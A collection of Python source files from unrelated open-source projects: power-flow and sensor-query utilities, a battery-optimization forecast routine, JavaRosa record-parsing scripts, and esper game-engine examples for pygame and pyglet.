for t in datetimes:
print("Run substation at " + t.strftime("%Y-%m-%d %H:%M:%S"))
feeder_baseloads = scada.get(t)
substation.baseload_allocation(feeder_loads=feeder_baseloads)
substation.set_power_devices(device_ids=[pv.id for pv in pvs],
values=[pv.get(t) for pv in pvs])
substation.run_powerflow(feeders=feeder_baseloads.keys())
nodes = substation.list_nodes()
nodes = substation.get_voltage(nodes)
results.append(nodes)
dfs = []
indexes = []
i=0
for result in results:
keys=[]
values=[]
df=result
columnNumbers = [x for x in range(df.shape[1])]
columnNumbers.remove(0)
df=df.iloc[:,columnNumbers]
df=df.set_index('node_id')
df = df.where((pandas.notnull(df)), None)
df['max']=df[['voltage_A','voltage_B','voltage_C']].max(axis=1)
df['min']=df[['voltage_A','voltage_B','voltage_C']].min(axis=1)
worstHighVoltage=df.loc[df['max'].idxmax()]
worstLowVoltage=df.loc[df['min'].idxmin()]
df=df.drop('min', axis=1)
df=df.drop('max', axis=1)
keys=df.index.tolist()
for index, row in df.iterrows():
values.append(row.to_dict())
df=dict(zip(keys, values))
df['worstHighVoltage']=worstHighVoltage.to_dict()
df['worstLowVoltage']=worstLowVoltage.to_dict()
dfs.append(df)
indexes.append(datetimes[i].strftime("%Y_%m_%d_%H_%M_%S"))
i=i+1
d = dict(zip(indexes, dfs))
r={}
r['results']=d
r['date']=day
return r
```
#### File: hil/sensors/uPMU_wrapper.py
```python
from requests import get
from json import loads
def get_latest(uuid, server, fmu=True):
#uuid from database
#server inclusive port: http://[server]:[port] (standard BTrDB port is 9000)
#fmu oprtion: print only value for FMU, or timestep and value if False
r = get("{}/q/nearest/{}?time={}&backwards=true".format(server, uuid, 2524608000*10**9))
if r.status_code == 200:
if fmu:
return loads(r.text.encode('ascii','ignore'))[1]
else:
return loads(r.text.encode('ascii','ignore'))
else:
return -1
def get_range(uuid, t_start, t_end, server, fmu=True):
#uuid from database
#t_start as start time of range in nano-seconds (unix time)
#t_end as end time of range in nano-seconds (unix time)
#server inclusive port: http://[server]:[port] (standard BTrDB port is 9000)
#fmu oprtion: print only value for FMU, or timestep and value if False
r = get("{}/data/uuid/{}?starttime={}&endtime={}&unitoftime=ns".format(server, uuid, t_start, t_end))
if r.status_code == 200:
if fmu:
return [val for ts, val in loads(r.text.encode('ascii','ignore'))[0]['Readings']]
else:
return loads(r.text.encode('ascii','ignore'))[0]['Readings']
else:
return -1
if __name__ == "__main__":
#Example code
server = "http://yourhost:yourport"
uuid = "youruuid"
print 'Test of uPMU queries for {}\nat {}'.format(uuid, server)
print 'Latest value as FMU:', get_latest(uuid, server)
temp = get_latest_avg(uuid, server, False)
print 'Latest value:', temp
print 'Latest readings of the last 1 second (120 with uPMU):', len(get_range(uuid, temp[0]-1*10**9, temp[0], server))
def exchange(configuration_file, time, input_names,
input_values, output_names, write_results):
"""
Return a list of output values from the Python-based Simulator.
The order of the output values must match the order of the output names.
:param configuration_file (String): Path to the Simulator model or configuration file
:param time (Float): Simulation time
:param input_names (Strings): Input names
:param input_values (Floats): Input values (same length as input_names)
:param output_names (Strings): Output names
:param write_results (Float): Store results to file (1 to store, 0 else)
Example:
>>> configuration_file = 'config.json'
>>> time = 0
>>> input_names = 'v'
>>> input_values = 220.0
>>> output_names = 'i'
>>> write_results = 0
>>> output_values = simulator(configuration_file, time, input_names,
input_values, output_names, write_results)
"""
# The assumption is that the uuid and the server name
# are concatenated and separated by a :" in output_names.
# This allows splitting the output_names and extracting those information
if (isinstance(output_names, list)):
output_values=[]
for var in output_names:
var = var.split(";")
if(len(var)<2):
s="The output name={!s} was incorrectly defined. The syntax must be server:uuid".format(var)
raise ValueError(s)
# Get the server name
server=var[0]
# Get the uuid which identifies the output
# to be retrieved
uuid=var[1]
output_values.append(1.0 * float(get_latest(uuid, server, False)[1]))
#output_values = 1.0 * float(output_values[1])
return output_values
``` |
{
"source": "Jonathan56/pylec_forecastpaper",
"score": 3
} |
#### File: pylec_forecastpaper/fppylec/main.py
```python
import pandas
from datetime import datetime, timedelta
from fppylec import metric, forecast, optimization, validate
def main(df, start, end, pv_capacity, battery_kWh, battery_kW,
f_method, f_kwarg, f_horizon, f_train_period, control_func):
"""
Core function to run forecast -> optimization.
Notes:
f_horizon=timedelta(days=2) - timedelta(minutes=15)
f_train_period=timedelta(days=14)
"""
# Result frame (add training data or "real data")
start_timer = datetime.now()
one_day = timedelta(hours=23, minutes=45)
result = df.loc[start-f_train_period:start-timedelta(minutes=15)].copy()
result['r_houses_kW'] = result['vo_houses_kW']
result['r_pv_kW'] = result['vo_pv_coef'] * pv_capacity
result['r_battery_kW'] = [0] * len(result)
# Main loop optimize once a day
days = (df.loc[start:end].groupby(pandas.Grouper(freq='D')).sum().index)
SOC_end = [battery_kWh / 2]
for day in days:
# Retrieve historical data, and prepare future results
training = result.loc[day-f_train_period:day].copy()
dfalgo = df.loc[day:day+f_horizon].copy()
# DFALGO
# Forecasts (PV and consumption)
dfalgo['f_pv_kW'] = dfalgo['vo_pv_coef'] * pv_capacity
if f_method == forecast.perfect:
dfalgo['f_houses_kW'] = dfalgo['vo_houses_kW']
else:
dfalgo['f_houses_kW'] = f_method(
training['r_houses_kW'], f_horizon, **f_kwarg)
# Control signal
dfalgo['f_battery_kW'], SOC = control_func(
dfalgo['f_houses_kW'], dfalgo['f_pv_kW'],
extra={'battery_kWh': battery_kWh,
'battery_kW': battery_kW,
'initial_kwh': SOC_end, 'eta': 0.95})
emin, emax = validate.battery(
dfalgo, (0, battery_kWh), (-battery_kW, battery_kW), SOC_end[0])
SOC_end = SOC['SOC_end']
# DFDAY
# Select results for only one day
dfday = df.loc[day:day+one_day].copy()
dfday['f_houses_kW'] = dfalgo.loc[day:day+one_day, 'f_houses_kW'].copy()
dfday['f_pv_kW'] = dfalgo.loc[day:day+one_day, 'f_pv_kW'].copy()
dfday['f_battery_kW'] = dfalgo.loc[day:day+one_day, 'f_battery_kW'].copy()
# Insert some impact of the coordination in the overall metered consump.
dfday['r_battery_kW'] = dfday['f_battery_kW'] # Perfect forecast
dfday['r_houses_kW'] = dfday['vo_houses_kW'] # Real = historic values
dfday['r_pv_kW'] = dfday['f_pv_kW'] # Perfect forecast
# Save for the next iteration
result = pandas.concat([result, dfday], axis=0, sort=True)
# Remove training from the results ?
result = result.loc[
start:end, ['vo_houses_kW', 'vo_pv_coef',
'f_houses_kW', 'f_pv_kW', 'f_battery_kW',
'r_houses_kW', 'r_pv_kW', 'r_battery_kW']]
time_elapsed = datetime.now() - start_timer
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
print('')
# Quality
metrics = {}
metrics['MAPE_%'] = metric.mape(
result, 'vo_houses_kW', 'f_houses_kW', threshold=0.1)
metrics['MAPE_9a8p_%'] = metric.mape_hod(
result, 'vo_houses_kW', 'f_houses_kW', threshold=0.1,
start='9:00', end='20:00')
metrics['MAE_kW'] = metric.mae(result, 'vo_houses_kW', 'f_houses_kW')
metrics['MASE'] = metric.mase(result, 'vo_houses_kW', 'f_houses_kW')
metrics['ME_kW'] = metric.me(result, 'vo_houses_kW', 'f_houses_kW')
# Value
r = metric.value_metrics(result, 'r_houses_kW', 'r_pv_kW', 'r_battery_kW')
metrics['scons_%'] = r['scons_%']
metrics['ssuff_%'] = r['ssuff_%']
metrics['scons_%_nobatt'] = r['scons_%_nobatt']
metrics['ssuff_%_nobatt'] = r['ssuff_%_nobatt']
return metrics
```
#### File: pylec_forecastpaper/fppylec/util.py
```python
import smtplib
from email.message import EmailMessage
import io
import pandas
def send_email(subject, body, df=False, html=False,
_from='<EMAIL>',
_pwd='<PASSWORD>'):
"""
Convenient function to get automatic updates on simulations
"""
message = EmailMessage()
message['From'] = _from
message['To'] = _from
message['Subject'] = subject
message.set_content(body)
if isinstance(df, pandas.DataFrame):
message.add_attachment(_export_csv(df), filename='result.csv')
if html:
with open(html, 'r') as f:
message.add_attachment(f.read(), filename=html)
# Send
mail_server = smtplib.SMTP_SSL('smtp.gmail.com')
mail_server.login(_from, _pwd)
mail_server.send_message(message)
mail_server.quit()
return True
def _export_csv(df):
with io.StringIO() as buffer:
df.to_csv(buffer)
return buffer.getvalue()
``` |
{
"source": "Jonathan727/javarosa",
"score": 3
} |
#### File: util/scripts/devicelogs.py
```python
from rmsdump import *
def read_log_entry (log_entry):
return tuple(log_entry.val[i].val for i in range(0, 3))
def print_log (log_atom):
print '%s> %s: %s' % (log_atom[0].strftime('%Y-%m-%d %H:%M:%S'), log_atom[1], log_atom[2])
if __name__ == "__main__":
data = sys.stdin.read()
stream = DataStream(data)
(rmses, num_rms, err) = extract_rms(stream)
log_rmses = [rms for rms in rmses if rms['name'].startswith('LOG_') and rms['name'] not in ('LOG_IX', 'LOG_PANIC')]
log_entries = []
for log_rms in log_rmses:
log_entries.extend([rec['content'][1] for rec in log_rms['records']])
panic_rms = [rms for rms in rmses if rms['name'] == 'LOG_PANIC']
if len(panic_rms) > 0 and len(panic_rms[0]['records']) > 0:
print 'PANIC entries detected!'
log_digest = [read_log_entry(le) for le in log_entries]
for la in sorted(log_digest, key=lambda la: la[0]):
print_log(la)
```
#### File: util/scripts/recparse.py
```python
import struct
from datetime import datetime
#TODO: if there is an error when deserializing the record, would be VERY nice to return the partial
#deserialization of the record up to that point
class Datum:
def __init__ (self, type, val):
self.type = type
self.val = val
def __repr__ (self):
return self.pretty_print(suppress_start_indent=True, suppress_end_newline=True)
def pretty_print (self, indent=0, suppress_start_indent=False, suppress_end_newline=False):
return self._pretty_print(indent, suppress_start_indent) + ('\n' if not suppress_end_newline else '')
def _pretty_print (self, indent, suppress_start_indent=False):
buf = ''
IND = ' ' * indent
if not suppress_start_indent:
buf += IND
if self.type in ('int', 'dbl', 'bool', 'str', 'date', 'bytes', 'generic', 'error'):
prefix = {'int': 'i', 'dbl': 'f', 'bool': 'b', 'str': 's', 'date': 'd', 'bytes': 'x', 'generic': '?', 'error': '!'}[self.type]
if self.val != None:
if self.type == 'int':
sval = '%d' % self.val
elif self.type == 'dbl':
sval = '%f' % self.val
elif self.type == 'bool':
sval = ('true' if self.val else 'false')
elif self.type == 'str' or self.type == 'bytes':
sval = repr(self.val)
elif self.type == 'date':
sval = self.val.strftime('%Y-%m-%d %H:%M:%S')
elif self.type == 'error':
sval = '#%d [%s]' % (len(self.val), tohex(self.val))
else:
sval = '<null>'
buf += '%s %s' % (prefix, sval)
elif self.type in ('seq', 'list', 'map') or self.type.startswith('obj:'):
_print_element = lambda e: e._pretty_print(indent + 1)
_print_mapping = lambda (k, v): k._pretty_print(indent + 1) + ' => ' + v._pretty_print(indent + 1, True)
def _iteritems_sorted (map):
for k in sorted(map.keys(), key=lambda datum: datum.val):
yield (k, map[k])
if self.type == 'seq':
config = (True, '()', lambda x: x, _print_element)
elif self.type.startswith('obj:'):
config = (False, '()', lambda x: x, _print_element)
elif self.type == 'list':
config = (True, '[]', lambda x: x, _print_element)
elif self.type == 'map':
config = (True, '{}', _iteritems_sorted, _print_mapping)
(show_count, brackets, iterator, print_elem) = config
buf += self.type + ' '
if self.val != None:
if show_count:
buf += '#%d ' % len(self.val)
buf += brackets[0]
if len(self.val) > 0:
buf += '\n'
for (i, e) in enumerate(iterator(self.val)):
buf += print_elem(e)
if i < len(self.val) - 1:
buf += ','
buf += '\n'
buf += IND
else:
buf += ' '
buf += brackets[1]
else:
buf += '<null>'
return buf
class Type:
def __init__ (self, base, params):
if base.startswith('obj:'):
self.custom = True
self.base = base[4:]
if self.base == '':
raise ValueError('custom object type not specified')
else:
self.custom = False
self.base = base
self.params = params
self.validate()
def basename (self):
return ('obj:' if self.custom else '') + self.base
def validate (self):
allowed = {
'int': 0, 'bool': 0, 'dbl': 0, 'str': 0, 'date': 0, 'bytes': 0,
'obj': 0, 'seq': None, 'null': 1, 'tagged': 0, 'list': 1, 'listp': 0, 'map': 2, 'mapp': 1
}
name = self.base if not self.custom else 'obj'
if name in allowed:
num_args = allowed[name]
if num_args != None and len(self.params) != num_args:
raise ValueError('wrong number of args for [%s]' % self.basename())
else:
raise ValueError('unrecognized type [%s]' % self.base)
def parse (self, stream):
return self.parse_func(stream)(*self.params)
def parse_func (self, stream):
builtin_types = {
'int': stream.read_int,
'bool': stream.read_bool,
'dbl': stream.read_float,
'str': stream.read_string,
'date': stream.read_date,
'bytes': stream.read_binary,
'null': stream.read_null,
'tagged': stream.read_tagged,
'list': stream.read_list,
'listp': stream.read_list_poly,
'map': stream.read_map,
'mapp': stream.read_map_poly,
'seq': lambda *subtypes: Datum('seq', tuple([type.parse(stream) for type in subtypes]))
}
if not self.custom:
return builtin_types[self.base]
else:
if self.base in custom_types:
parse_obj_func = custom_types[self.base]
return lambda: Datum(self.basename(), parse_obj_func(stream))
else:
raise ValueError('unknown object type [%s]' % self.base) #TODO: propogate partial deserialization
def null_datum (self):
if self.base in ['null', 'tagged']:
basetype = 'generic'
elif self.base == 'listp':
basetype = 'list'
elif self.base == 'mapp':
basetype = 'map'
else:
basetype = self.base
return Datum(basetype, None)
def unwrap (self):
if self.base != 'seq' or len(self.params) != 1:
raise ValueError('not a single-item sequence')
return self.params[0]
class Stream:
def __init__ (self, bytes):
self.stream = self.stream_gen(bytes)
self.buffers = []
def stream_gen (self, bytes):
for b in bytes:
yield b
def read (self):
try:
b = self.stream.next()
for buffer in self.buffers:
buffer.append(b)
return b
except StopIteration:
raise self.EndOfStream([''.join(buff) for buff in reversed(self.buffers)])
def mark (self):
self.buffers.append([])
def iter (self):
try:
while True:
yield self.read()
except self.EndOfStream:
raise StopIteration
class EndOfStream (Exception):
bytes = 'not implemented'
def __init__ (self, buffers):
self.buffers = buffers
def __str__ (self):
return 'unexpected end of stream'
class DataStream (Stream):
def __init__ (self, bytes):
Stream.__init__(self, bytes)
def read (self, n=1):
return ''.join([Stream.read(self) for i in range(0, n)])
def read_int (self, require_pos=False):
(buff, c) = ([], None)
while c == None or ord(c) >= 128:
c = self.read()
buff.append(ord(c) % 128)
if buff[0] >= 64:
buff[0] -= 128
val = reduce(lambda x, y: 128 * x + y, buff)
if require_pos and val < 0:
raise ValueError('negative integer') #TODO: propogate partial deserialization
elif len(buff) > 1:
k = len(buff) - 1
vmin = -(128**k / 2)
vmax = 128**k / 2 - 1
if val <= vmax and val >= vmin:
raise ValueError('overlong integer encoding') #TODO: propogate partial deserialization
return Datum('int', val)
def read_string (self):
n = reduce(lambda x, y: 256 * x + y, [ord(b) for b in self.read(2)])
val = self.read(n)
try:
unicode(val, 'utf-8')
except UnicodeDecodeError:
raise #TODO: propogate partial deserialization
return Datum('str', val)
def read_bool (self):
b = ord(self.read())
if b != 0 and b != 1:
raise ValueError('boolean not 0x00 or 0x01') #TODO: propogate partial deserialization
return Datum('bool', b == 1)
def read_float (self):
return Datum('dbl', struct.unpack('!d', self.read(8))[0])
def read_date (self):
try:
return Datum('date', datetime.utcfromtimestamp(self.read_int().val / 1000.))
except ValueError: # out-of-range error
raise ValueError('date ticks overflow') #TODO: propogate partial deserialization
def read_binary (self):
return Datum('bytes', self.read(self.read_int().val))
class CompoundDataStream (DataStream):
def __init__ (self, bytes):
DataStream.__init__(self, bytes)
def read_null (self, type):
if self.read_bool().val:
return type.parse(self)
else:
return type.null_datum()
def read_list (self, type):
return self._read_list(lambda: type.parse(self))
def _read_list (self, get_elem):
v = []
n = self.read_int().val
for i in range(0, n):
v.append(get_elem())
return Datum('list', v)
def read_map (self, keytype, elemtype):
return self._read_map(keytype, lambda: elemtype.parse(self))
def _read_map (self, keytype, get_elem):
m = {}
n = self.read_int().val
for i in range(0, n):
k = keytype.parse(self)
v = get_elem()
m[k] = v
return Datum('map', m)
def read_tagged (self):
return self.read_type().parse(self)
def read_type (self):
tag = self.read(4)
basetype = basetype_from_tag(tag)
if basetype == 'wrapper':
(basetype, params) = self.unwrap_type()
else:
params = []
return Type(basetype, params)
def unwrap_type (self):
subtype = self.read_int().val
if subtype == 0:
return ('null', [self.read_type()])
elif subtype == 32:
return ('list', [self.read_type()])
elif subtype == 33:
return ('listp', [])
elif subtype == 34:
self.read_bool() # 'ordered' flag
return ('map', [self.read_type(), self.read_type()])
elif subtype == 35:
self.read_bool() # 'ordered' flag
return ('mapp', [self.read_type()])
else:
raise ValueError('unrecognized wrapper code [%d]' % subtype) #TODO: propogate partial deserialization
def read_list_poly (self):
return self._read_list(lambda: self.read_tagged())
def read_map_poly (self, keytype):
return self._read_map(keytype, lambda: self.read_tagged())
def read_compound (self, template):
return type_from_template(template).parse(self)
def read_template (self, template):
return type_list_from_template(template).parse(self)
def deserialize (bytes, template):
stream = CompoundDataStream(bytes)
obj = stream.read_compound(template)
#handle botched parsing here?
#handle extra data left over here?
#return (status, obj)
return obj
def type_from_template (template):
return type_list_from_template(template).unwrap()
def type_list_from_template (template):
return Type('seq', tuple([type_from_template_token(token) for token in tokenize(template, ',', '()')]))
def type_from_template_token (token):
if '(' in token and token[-1] != ')':
raise ValueError('extra crap after close paren')
if '(' in token:
name = token.split('(')[0]
args = list(type_list_from_template(token[token.find('(')+1:-1]).params)
else:
name = token
args = []
if len(name) == 0:
raise ValueError('empty token name')
return Type(name, args)
def tokenize (str, sep, brackets):
depth = 0
tok_start = 0
for i in range(0, len(str) + 1):
new_token = False
if i == len(str):
if depth == 0:
new_token = True
else:
raise ValueError('unbalanced brackets')
elif str[i] == sep and depth == 0:
new_token = True
elif str[i] == brackets[0]:
depth += 1
elif str[i] == brackets[1]:
depth -= 1
if depth < 0:
raise ValueError('unbalanced parens')
if new_token:
token = str[tok_start:i]
tok_start = i + 1
yield token
def parse_custom (template):
return lambda stream: stream.read_template(template).val
# relies on stream containing ONLY data for the record
def _parse_property (stream):
return (Datum('str', ''.join(list(stream.iter()))),)
def _parse_tree_child (stream):
if stream.read_bool().val:
val = stream.read_compound('obj:treeelem')
else:
val = stream.read_tagged() # if this happens, which it almost certainly won't, we almost certainly won't have the prototype registered
return (val,)
def _parse_xpath_num_lit (stream):
if stream.read_bool().val:
val = stream.read_float()
else:
val = stream.read_int()
return (val,)
def _parse_xpath_path (stream):
type = stream.read_int()
filtexpr = stream.read_compound('obj:xpath-expr-filt') if type.val == 2 else None
steps = stream.read_compound('list(obj:xpath-step)')
return (type, filtexpr, steps) if filtexpr != None else (type, steps)
def _parse_xpath_step (stream):
axis = stream.read_int()
test = stream.read_int()
if test.val == 0:
detail = stream.read_compound('obj:qname')
elif test.val == 2:
detail = stream.read_string()
elif test.val == 6:
detail = stream.read_compound('null(str)')
else:
detail = None
preds = stream.read_compound('listp')
return (axis, test, detail, preds) if detail != None else (axis, test, preds)
custom_types = {
'rmsinfo': parse_custom('int,int,int'),
'recloc': parse_custom('int,int'),
'user': parse_custom('str,str,int,str,bool,map(str,str)'),
'case': parse_custom('str,str,str,str,bool,null(date),int,mapp(str)'),
'patref': parse_custom('str,date,date,str,str,int,bool'),
'formdef': parse_custom('int,str,null(str),listp,obj:forminst,null(obj:loclzr),list(obj:condition),list(obj:recalc),listp'),
'qdef': parse_custom('int,null(str),null(str),null(str),null(str),null(str),null(str),null(str),int,list(obj:selchoice),null(tagged)'),
'selchoice': parse_custom('bool,str,str'),
'gdef': parse_custom('int,tagged,null(str),null(str),null(str),null(str),bool,listp,bool,null(tagged)'),
'loclzr': parse_custom('bool,bool,map(str,listp),list(str),null(str),null(str)'),
'resfiledatasrc': parse_custom('str'),
'localedatasrc': parse_custom('map(str,str)'),
'condition': parse_custom('tagged,obj:treeref,list(obj:treeref),int,int'),
'recalc': parse_custom('tagged,obj:treeref,list(obj:treeref)'),
'treeref': parse_custom('int,list(str),list(int)'),
'forminst': parse_custom('int,int,null(str),null(str),null(date),map(str,str),obj:treeelem'),
# 'forminst-compact': ..., oh boy...
'treeelem': parse_custom('str,int,bool,null(tagged),null(list(obj:treechildpoly)),int,bool,bool,bool,bool,bool,null(obj:constraint),str,str,list(str)'),
'treechildpoly': _parse_tree_child,
'intdata': parse_custom('int'),
'booldata': parse_custom('bool'),
'strdata': parse_custom('str'),
'selonedata': parse_custom('obj:sel'),
'selmultidata': parse_custom('list(obj:sel)'),
'sel': parse_custom('str,int'),
'floatdata': parse_custom('dbl'),
'datedata': parse_custom('date'),
'datetimedata': parse_custom('date'),
'timedata': parse_custom('date'),
'constraint': parse_custom('tagged,str'),
'xpathcond': parse_custom('tagged'),
'xpathref': parse_custom('str,obj:treeref'),
'xpath-expr-arith': parse_custom('int,tagged,tagged'),
'xpath-expr-bool': parse_custom('int,tagged,tagged'),
'xpath-expr-cmp': parse_custom('int,tagged,tagged'),
'xpath-expr-eq': parse_custom('bool,tagged,tagged'),
'xpath-expr-filt': parse_custom('tagged,listp'),
'xpath-expr-func': parse_custom('obj:qname,listp'),
'xpath-expr-numlit': _parse_xpath_num_lit,
'xpath-expr-numneg': parse_custom('tagged'),
'xpath-expr-path': _parse_xpath_path,
'xpath-expr-strlit': parse_custom('str'),
'xpath-expr-union': parse_custom('tagged,tagged'),
'xpath-expr-varref': parse_custom('obj:qname'),
'xpath-step': _parse_xpath_step,
'qname': parse_custom('null(str),str'),
'property': _parse_property,
'txmsg': parse_custom('tagged'),
'simplehttptxmsg': parse_custom('str,int,str,int,str,date,date,int,int,str,int,str,bytes'),
'logentry': parse_custom('date,str,str'),
'cc-recd-forms-mapping': parse_custom('list(int),map(int,int)')
}
def basetype_from_tag (tag):
type_tags = {
'\xff\xff\xff\xff': 'wrapper',
'\xe5\xe9\xb5\x92': 'generic', #object -- should never be encountered
'\x7c\xa1\x6f\xdb': 'int',
'\x8a\xc5\x87\x0b': 'int', #long
'\xb5\xdc\x2e\x41': 'int', #short
'\x03\x3e\xb3\x91': 'int', #byte
'\x58\x4b\x12\x84': 'char',
'\xe4\xf9\xf9\xae': 'bool',
'\xc9\x83\xee\x7b': 'dbl', #float
'\x8e\xa8\x96\x89': 'dbl',
'\x42\xc2\x5b\xe3': 'str',
'\xc5\x1d\xfd\xa6': 'date',
'\x27\x51\x2e\xc9': 'obj:qdef',
'\xb3\xc4\x9b\xbd': 'obj:gdef',
'\x68\xc2\xaf\xad': 'obj:intdata',
'\x8f\x4b\x45\xfe': 'obj:booldata',
'\xed\xce\xd1\xce': 'obj:geodata',
'\x02\x6f\x56\x15': 'obj:strdata',
'\x29\xd7\x1a\x40': 'obj:selonedata',
'\xf7\x30\xcc\x7d': 'obj:selmultidata',
'\x4e\x52\xe2\x15': 'obj:floatdata',
'\x51\x0e\x1e\x6e': 'obj:datedata',
'\x6f\x87\x88\xa7': 'obj:datetimedata',
'\x68\x4e\x4e\x2e': 'obj:timedata',
'\x2b\xf7\x1a\xcb': 'obj:ptrdata',
'\xec\xa8\xec\xde': 'obj:multiptrdata',
'\xef\x74\x56\x54': 'obj:basicdataptr',
'\xf3\x06\x34\x28': 'obj:xpath-expr-arith',
'\xf6\xe4\xb9\xaf': 'obj:xpath-expr-bool',
'\x91\x2e\xfc\xee': 'obj:xpath-expr-cmp',
'\x65\x71\x6e\x97': 'obj:xpath-expr-eq',
'\xe7\x68\xb3\x6d': 'obj:xpath-expr-filt',
'\x67\x44\xc2\x7e': 'obj:xpath-expr-func',
'\x17\xe0\x31\x27': 'obj:xpath-expr-numlit',
'\x35\x60\xa2\x3b': 'obj:xpath-expr-numneg',
'\xfc\x87\x51\x53': 'obj:xpath-expr-path',
'\xef\x45\x98\x8f': 'obj:xpath-expr-strlit',
'\xff\x82\x5b\x62': 'obj:xpath-expr-union',
'\xf9\x4b\xf7\xa8': 'obj:xpath-expr-varref',
'\x5c\x57\xbb\x5e': 'obj:xpathref',
'\x5e\x88\x11\xfe': 'obj:xpathcond',
'\xf4\xaa\xb2\xe9': 'obj:resfiledatasrc',
'\xf6\xc7\x83\x5c': 'obj:localedatasrc',
'\x27\x53\xac\x23': 'obj:simplehttptxmsg',
'\x01\x12\x89\x43': 'obj:smstxmsg',
'\x21\x71\xd6\x5d': 'obj:binsmstxmsg',
# '\xed\x09\xe3\x8e': 'obj:forminst', #unused i think
# '\xfb\x2c\xa2\x76': 'obj:txmsgserwrapper' #unused i think
}
if tag in type_tags:
basetype = type_tags[tag]
if basetype == 'generic':
raise ValueError("'generic' type tag should never show up in practice")
return basetype
else:
raise ValueError("no type known for tag %s" % tohex(tag)) #TODO: propogate partial deserialization
def hexinput (hexstr):
return ''.join([chr(int(c, 16)) for c in hexstr.split()])
def tohex (bytes):
return ' '.join(['%02x' % ord(b) for b in bytes])
``` |
{
"source": "jonathanabennett/esper",
"score": 3
} |
#### File: esper/examples/pygame_example.py
```python
import pygame
import esper
FPS = 60
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, image, posx, posy, depth=0):
self.image = image
self.depth = depth
self.x = posx
self.y = posy
self.w = image.get_width()
self.h = image.get_height()
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.maxx = maxx
self.miny = miny
self.maxy = maxy
def process(self):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
# Update the Renderable Component's position by it's Velocity:
rend.x += vel.x
rend.y += vel.y
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it tries to go outside:
rend.x = max(self.minx, rend.x)
rend.y = max(self.miny, rend.y)
rend.x = min(self.maxx - rend.w, rend.x)
rend.y = min(self.maxy - rend.h, rend.y)
class RenderProcessor(esper.Processor):
def __init__(self, window, clear_color=(0, 0, 0)):
super().__init__()
self.window = window
self.clear_color = clear_color
def process(self):
# Clear the window:
self.window.fill(self.clear_color)
# This will iterate over every Entity that has this Component, and blit it:
for ent, rend in self.world.get_component(Renderable):
self.window.blit(rend.image, (rend.x, rend.y))
# Flip the framebuffers
pygame.display.flip()
################################
# The main core of the program:
################################
def run():
# Initialize Pygame stuff
pygame.init()
window = pygame.display.set_mode(RESOLUTION)
pygame.display.set_caption("Esper Pygame example")
clock = pygame.time.Clock()
pygame.key.set_repeat(1, 1)
# Initialize Esper world, and create a "player" Entity with a few Components.
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
world.add_component(player, Renderable(image=pygame.image.load("redsquare.png"), posx=100, posy=100))
# Another motionless Entity:
enemy = world.create_entity()
world.add_component(enemy, Renderable(image=pygame.image.load("bluesquare.png"), posx=400, posy=250))
# Create some Processor instances, and asign them to be processed.
render_processor = RenderProcessor(window=window)
movement_processor = MovementProcessor(minx=0, maxx=RESOLUTION[0], miny=0, maxy=RESOLUTION[1])
world.add_processor(render_processor)
world.add_processor(movement_processor)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
# Here is a way to directly access a specific Entity's
# Velocity Component's attribute (y) without making a
# temporary variable.
world.component_for_entity(player, Velocity).x = -3
elif event.key == pygame.K_RIGHT:
# For clarity, here is an alternate way in which a
# temporary variable is created and modified. The previous
# way above is recommended instead.
player_velocity_component = world.component_for_entity(player, Velocity)
player_velocity_component.x = 3
elif event.key == pygame.K_UP:
world.component_for_entity(player, Velocity).y = -3
elif event.key == pygame.K_DOWN:
world.component_for_entity(player, Velocity).y = 3
elif event.key == pygame.K_ESCAPE:
running = False
elif event.type == pygame.KEYUP:
if event.key in (pygame.K_LEFT, pygame.K_RIGHT):
world.component_for_entity(player, Velocity).x = 0
if event.key in (pygame.K_UP, pygame.K_DOWN):
world.component_for_entity(player, Velocity).y = 0
# A single call to world.process() will update all Processors:
world.process()
clock.tick(FPS)
if __name__ == "__main__":
run()
pygame.quit()
```
#### File: esper/examples/pyglet_example.py
```python
import pyglet
import esper
FPS = 60
RESOLUTION = 720, 480
##################################
# Define some Components:
##################################
class Velocity:
def __init__(self, x=0.0, y=0.0):
self.x = x
self.y = y
class Renderable:
def __init__(self, sprite):
self.sprite = sprite
self.w = sprite.width
self.h = sprite.height
################################
# Define some Processors:
################################
class MovementProcessor(esper.Processor):
def __init__(self, minx, maxx, miny, maxy):
super().__init__()
self.minx = minx
self.miny = miny
self.maxx = maxx
self.maxy = maxy
def process(self, dt):
# This will iterate over every Entity that has BOTH of these components:
for ent, (vel, rend) in self.world.get_components(Velocity, Renderable):
# Update the Renderable Component's position by it's Velocity:
# An example of keeping the sprite inside screen boundaries. Basically,
# adjust the position back inside screen boundaries if it is outside:
new_x = max(self.minx, rend.sprite.x + vel.x)
new_y = max(self.miny, rend.sprite.y + vel.y)
new_x = min(self.maxx - rend.w, new_x)
new_y = min(self.maxy - rend.h, new_y)
rend.sprite.position = new_x, new_y
###############################################
# Initialize pyglet window and graphics batch:
###############################################
window = pyglet.window.Window(width=RESOLUTION[0],
height=RESOLUTION[1],
caption="Esper pyglet example")
batch = pyglet.graphics.Batch()
# Initialize Esper world, and create a "player" Entity with a few Components:
world = esper.World()
player = world.create_entity()
world.add_component(player, Velocity(x=0, y=0))
player_image = pyglet.resource.image("redsquare.png")
world.add_component(player, Renderable(sprite=pyglet.sprite.Sprite(img=player_image,
x=100,
y=100,
batch=batch)))
# Another motionless Entity:
enemy = world.create_entity()
enemy_image = pyglet.resource.image("bluesquare.png")
world.add_component(enemy, Renderable(sprite=pyglet.sprite.Sprite(img=enemy_image,
x=400,
y=250,
batch=batch)))
# Create some Processor instances, and asign them to the World to be processed:
movement_processor = MovementProcessor(minx=0, miny=0, maxx=RESOLUTION[0], maxy=RESOLUTION[1])
world.add_processor(movement_processor)
################################################
# Set up pyglet events for input and rendering:
################################################
@window.event
def on_key_press(key, mod):
if key == pyglet.window.key.RIGHT:
world.component_for_entity(player, Velocity).x = 3
if key == pyglet.window.key.LEFT:
